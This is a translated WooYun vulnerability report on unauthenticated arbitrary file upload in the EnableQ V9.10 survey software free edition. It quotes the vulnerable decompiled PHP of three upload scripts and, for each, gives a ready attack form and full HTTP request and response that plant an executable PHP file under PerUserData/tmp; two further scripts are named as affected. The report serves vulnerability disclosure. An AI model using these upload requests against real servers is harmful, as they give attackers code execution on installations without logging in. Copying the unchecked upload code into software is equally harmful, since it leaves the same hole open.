Bug ID: WooYun-2015-0128219
Title: EnableQ official free edition has multiple arbitrary file uploads; getshell without logging in
Vendor: 北京科维能动信息技术有限公司 (Beijing Kewei Nengdong Information Technology Co., Ltd.)
Author: Bear baby
Submitted: 2015-07-21 22:25
Published: 2015-10-20 13:51
Vulnerability type: File upload leading to arbitrary code execution
Severity: High
Self-assessed Rank: 18
Status: Vendor was notified of the vulnerability but ignored it
Tags:
2015-07-21: Details sent to the vendor, awaiting vendor handling
2015-07-22: Vendor actively ignored the vulnerability; details opened to third-party security partners (NSFOCUS, Tangchao Security Patrol, Wusheng Information)
2015-09-15: Details opened to core white hats and domain experts
2015-09-25: Details opened to regular white hats
2015-10-05: Details opened to intern white hats
2015-10-20: Details opened to the public
"Quietly working hard all along"
Version: EnableQ_V9.10_免费版_2问卷许可证_整合安装包_For Windows (EnableQ V9.10 free edition, 2-questionnaire license, integrated installer for Windows)
Download path:
http://www.enableq.com/control/WebAPI/Download.php?downloadID=52&language=CN
Judging by the download counter on that page it has been downloaded quite a lot: over 260,000 times.
Although the vendor has already moved on to 10.20, the free edition it offers is still 9.10. A quick analysis shows that this version contains several arbitrary file upload flaws that lead straight to a shell. The first is in Android/FileUpload.php; part of its code follows:
```php
session_start( );
require_once( ROOT_PATH."Entry/Global.fore.php" );
// field name is taken straight from the optionID query parameter; no login check anywhere
$thisFiles = "uploadedfile_".$_GET['optionID'];
$filePhyPath = $Config['absolutenessPath']."/PerUserData/tmp/";
CreateDir( $filePhyPath );
$time = Time( );
// housekeeping of the tmp directory (as decompiled)
if ( is_dir( $filePhyPath ) && ( $tmpFilePath = opendir( $filePhyPath ) ) )
{
    while ( ( $tmpFile = readdir( $tmpFilePath ) ) !== FALSE )
    {
        $theFileTime = filectime( $filePhyPath.$tmpFile );
        if ( !( $theFileTime <= $time - 86400 ) && !( $tmpFile != "index.html" ) )
        {
            @unlink( $filePhyPath.$tmpFile );
        }
    }
    closedir( $tmpFilePath );
}
// the three conditions are joined with &&, so the request is refused only when all of them hold
if ( !isset( $_FILES[$thisFiles] ) && !is_uploaded_file( $_FILES[$thisFiles]['tmp_name'] ) && $_FILES[$thisFiles]['error'] != 0 )
{
    header( "HTTP/1.1 500 File Upload Error" );
    if ( isset( $_FILES[$thisFiles] ) )
    {
        echo "false|".$_GET['optionID']."|".$_FILES[$thisFiles]['error'];
    }
    exit( );
}
// dmeqjch is the name the decompiled source uses; it behaves like explode() here
$question_File_ID = dmeqjch( "_", $thisFiles );
// the extension is whatever follows the last '.' of the client-supplied name, only lowercased
$tmpExt = dmeqjch( ".", $_FILES[$thisFiles]['name'] );
$tmpNum = count( $tmpExt ) - 1;
$extension = strtolower( $tmpExt[$tmpNum] );
if ( $question_File_ID['2'] != "" )
{
    $newFileName = $question_File_ID['2']."_".date( "YmdHis", $time ).rand( 1, 999 ).".".$extension;
}
else
{
    $newFileName = date( "YmdHis", $time ).rand( 1, 999 ).".".$extension;
}
// stored under the web root with the attacker-chosen extension
if ( Copy( $_FILES[$thisFiles]['tmp_name'], $filePhyPath.$newFileName ) )
{
    echo "true|".$_GET['optionID']."|".$newFileName;
    exit( );
}
?>
```
There is no validation worth the name, so any file can be uploaded; it is stored under PerUserData/tmp/. The error guard joins its three conditions with &&, so a request is rejected only when the field is missing, not an uploaded file, and carries a non-zero error code all at once; the extension is taken from the client-supplied file name and merely lowercased, and no session or login is checked. Based on the code above, build an upload page like this:
```html
<form action="http://SITE/Android/FileUpload.php?optionID=1" method="post" enctype="multipart/form-data" name="form1">
  <input type="file" name="uploadedfile_1" />
  <input type="submit" name="button" value="Submit" />
</form>
```
Fiddler capture:
```http
Request
POST **.**.**.**:9009/enableq/Android/FileUpload.php?optionID=1 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/7.0)
Content-Type: multipart/form-data; boundary=---------------------------7df15424111c02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 351
Host: **.**.**.**:9009
Pragma: no-cache
Cookie: PHPSESSID=3db104004741b2b97d850ac25cdbfbb3

-----------------------------7df15424111c02
Content-Disposition: form-data; name="uploadedfile_1"; filename="C:\Users\Administrator\Desktop\i.php"
Content-Type: application/php

<?php phpinfo();?>
-----------------------------7df15424111c02
Content-Disposition: form-data; name="button"

submit
-----------------------------7df15424111c02--

Response
HTTP/1.1 200 OK
Date: Tue, 21 Jul 2015 13:12:48 GMT
Server: Apache/2.2.19 (Win32) PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 28
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

true|1|20150721211248628.php
```
The corresponding path is /PerUserData/tmp/20150721211248628.php (screenshot in the original report).
The second location is /JS/DistributionUpload.php; part of its code follows:
```php
// the field name itself comes from the POST body
$thisFiles = $_POST['uploadFileName'];
$filePhyPath = $Config['absolutenessPath']."/PerUserData/tmp/";
CreateDir( $filePhyPath );
$time = Time( );
if ( is_dir( $filePhyPath ) && ( $tmpFilePath = opendir( $filePhyPath ) ) )
{
    while ( ( $tmpFile = readdir( $tmpFilePath ) ) !== FALSE )
    {
        $theFileTime = filectime( $filePhyPath.$tmpFile );
        if ( !( $theFileTime <= $time - 86400 ) && !( $tmpFile != "index.html" ) )
        {
            @unlink( $filePhyPath.$tmpFile );
        }
    }
    closedir( $tmpFilePath );
}
// same && guard as in Android/FileUpload.php
if ( !isset( $_FILES[$thisFiles] ) && !is_uploaded_file( $_FILES[$thisFiles]['tmp_name'] ) && $_FILES[$thisFiles]['error'] != 0 )
{
    header( "HTTP/1.1 500 File Upload Error" );
    if ( isset( $_FILES[$thisFiles] ) )
    {
        echo $_FILES[$thisFiles]['error'];
    }
    exit( );
}
// an existing file of the same name is deleted first, then the upload is stored under its original name
if ( file_exists( $filePhyPath.$_FILES[$thisFiles]['name'] ) )
{
    @unlink( $filePhyPath.$_FILES[$thisFiles]['name'] );
}
if ( Copy( $_FILES[$thisFiles]['tmp_name'], $filePhyPath.$_FILES[$thisFiles]['name'] ) )
{
    echo $_FILES[$thisFiles]['name'];
    exit( );
}
```
Essentially the same as the first one, with no filtering; the only difference is that the file field name is read from the uploadFileName POST parameter. Adjust the upload page slightly:
```html
<form action="http://SITE/JS/DistributionUpload.php" method="post" enctype="multipart/form-data" name="form1">
  <input type="hidden" name="uploadFileName" value="uploadedfile_1" />
  <input type="file" name="uploadedfile_1" />
  <input type="submit" name="button" value="submit" />
</form>
```
Fiddler capture:
```http
Request
POST **.**.**.**:9009/enableq/JS/DistributionUpload.php HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/7.0)
Content-Type: multipart/form-data; boundary=---------------------------7df3a1a111c02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 465
Host: **.**.**.**:9009
Pragma: no-cache
Cookie: PHPSESSID=3db104004741b2b97d850ac25cdbfbb3

-----------------------------7df3a1a111c02
Content-Disposition: form-data; name="uploadFileName"

uploadedfile_1
-----------------------------7df3a1a111c02
Content-Disposition: form-data; name="uploadedfile_1"; filename="C:\Users\Administrator\Desktop\i.php"
Content-Type: application/php

<?php phpinfo();?>
-----------------------------7df3a1a111c02
Content-Disposition: form-data; name="button"

submit
-----------------------------7df3a1a111c02--

Response
HTTP/1.1 200 OK
Date: Tue, 21 Jul 2015 13:21:10 GMT
Server: Apache/2.2.19 (Win32) PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

i.php
```
This one does not even rename the file: it is stored under the client-supplied name, overwriting any existing file of that name, at /PerUserData/tmp/i.php (screenshot in the original report).
The third location is /JS/FileUpload.php; the relevant code follows:
```php
$thisFiles = $_POST['uploadFileName'];
// with dataDomainName configured, the target directory is built from client-supplied theSurveyID and uploadFileTime
if ( $Config['dataDomainName'] != "" )
{
    $theFileTime = trim( $_POST['uploadFileTime'] );
    $filePhyPath = $Config['absolutenessPath']."/".$Config['dataDirectory']."/response_".$_POST['theSurveyID']."/".date( "Y-m", $theFileTime )."/".date( "d", $theFileTime )."/";
}
else
{
    $filePhyPath = $Config['absolutenessPath']."/PerUserData/tmp/";
}
CreateDir( $filePhyPath );
$time = Time( );
if ( is_dir( $filePhyPath ) && ( $tmpFilePath = opendir( $filePhyPath ) ) )
{
    while ( ( $tmpFile = readdir( $tmpFilePath ) ) !== FALSE )
    {
        $theFileTime = filectime( $filePhyPath.$tmpFile );
        if ( !( $theFileTime <= $time - 86400 ) && !( $tmpFile != "index.html" ) )
        {
            @unlink( $filePhyPath.$tmpFile );
        }
    }
    closedir( $tmpFilePath );
}
// same && guard as in the other two scripts
if ( !isset( $_FILES[$thisFiles] ) && !is_uploaded_file( $_FILES[$thisFiles]['tmp_name'] ) && $_FILES[$thisFiles]['error'] != 0 )
{
    header( "HTTP/1.1 500 File Upload Error" );
    if ( isset( $_FILES[$thisFiles] ) )
    {
        echo $_FILES[$thisFiles]['error'];
    }
    exit( );
}
$question_File_ID = dmeqjch( "_", $thisFiles );
// extension again taken from the client-supplied name and only lowercased
$tmpExt = dmeqjch( ".", $_FILES[$thisFiles]['name'] );
$tmpNum = count( $tmpExt ) - 1;
$extension = strtolower( $tmpExt[$tmpNum] );
// for uploadedfile_1 the prefix becomes "1_"
if ( $question_File_ID['1'] != "" )
{
    $newFileName = $question_File_ID['1']."_".date( "YmdHis", $time ).rand( 1, 999 ).".".$extension;
}
else
{
    $newFileName = date( "YmdHis", $time ).rand( 1, 999 ).".".$extension;
}
if ( Copy( $_FILES[$thisFiles]['tmp_name'], $filePhyPath.$newFileName ) )
{
    echo $newFileName;
    exit( );
}
```
The upload page is the same as for the second location. Fiddler capture:
```http
Request
POST **.**.**.**:9009/enableq/JS/FileUpload.php HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/7.0)
Content-Type: multipart/form-data; boundary=---------------------------7df3a1a111c02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 465
Host: **.**.**.**:9009
Pragma: no-cache
Cookie: PHPSESSID=3db104004741b2b97d850ac25cdbfbb3

-----------------------------7df3a1a111c02
Content-Disposition: form-data; name="uploadFileName"

uploadedfile_1
-----------------------------7df3a1a111c02
Content-Disposition: form-data; name="uploadedfile_1"; filename="C:\Users\Administrator\Desktop\i.php"
Content-Type: application/php

<?php phpinfo();?>
-----------------------------7df3a1a111c02
Content-Disposition: form-data; name="button"

submit
-----------------------------7df3a1a111c02--

Response
HTTP/1.1 200 OK
Date: Tue, 21 Jul 2015 13:26:46 GMT
Server: Apache/2.2.19 (Win32) PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

1_20150721212647249.php
```
The file lands at /PerUserData/tmp/1_20150721212647249.php (screenshot in the original report). With $Config['dataDomainName'] set, this script stores the file under the survey's response directory instead, built from the client-supplied theSurveyID and uploadFileTime values.
The remaining locations, /JS/RecFileUpload.php and /JS/ReportFileUpload.php, have the same code problem and use the same upload page as the third one, so they are not repeated here. A few further upload issues require an enhanced license by default and are not posted here.
Vendor response:
Severity: No impact, vendor ignored
Ignored at: 2015-10-20 13:51
https:///vul/info/qid/QTVA-2014-
This vulnerability exists in the old version and was already reported on the 360 vulnerability platform on 2014-12-02, [email protected] baby
Rating: None yet
Author's comment: Thanks to the reviewer for the hard work... still at work this late. My respects to you..